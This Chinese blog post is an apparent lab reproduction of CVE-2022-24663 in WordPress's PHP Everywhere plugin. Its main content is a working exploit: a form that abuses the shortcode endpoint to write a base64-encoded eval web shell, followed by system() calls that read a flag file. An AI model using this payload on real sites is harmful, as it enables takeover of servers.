banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

CVE-2022-24663

image

产品简介#

WordPress 是一款个人博客系统,并逐步演化成一款内容管理系统软件,它是使用 PHP 语言和 MySQL 数据库开发的,用户可以在支持 PHP 和 MySQL 数据库的服务器上使用自己的博客。

漏洞概述#

任何订阅者都可以利用该漏洞发送带有 “短代码” 参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。

影响范围#

<= 2.0.3
影响插件:PHP Everywhere

利用流程#

访问后台地址:

http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/wp-admin

账号:test/test

删除仪表盘下方的内容,浏览器 F12,添加一个节点,输入如下内容:

<form
action="http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php"
method="post"
>
<input name="action" value="parse-media-shortcode" />
<textarea name="shortcode">
[php_everywhere] <?php file_put_contents("/var/www/html/111.php", base64_decode("PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTsgPz4=")); ?>[/php_everywhere]</textarea>
<input type="submit" value="Execute" />
</form>

然后执行即可(点击 execute),访问如下链接:

http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php

页面返回 200.

http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php?cmd=phpinfo();

http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php?cmd=system(%27tac%20/f*%27);

修复建议#

  • 升级版本

参考#

NVD - CVE-2022-24663

图片来自

加载中...
此文章数据所有权由区块链加密技术和智能合约保障仅归创作者所有。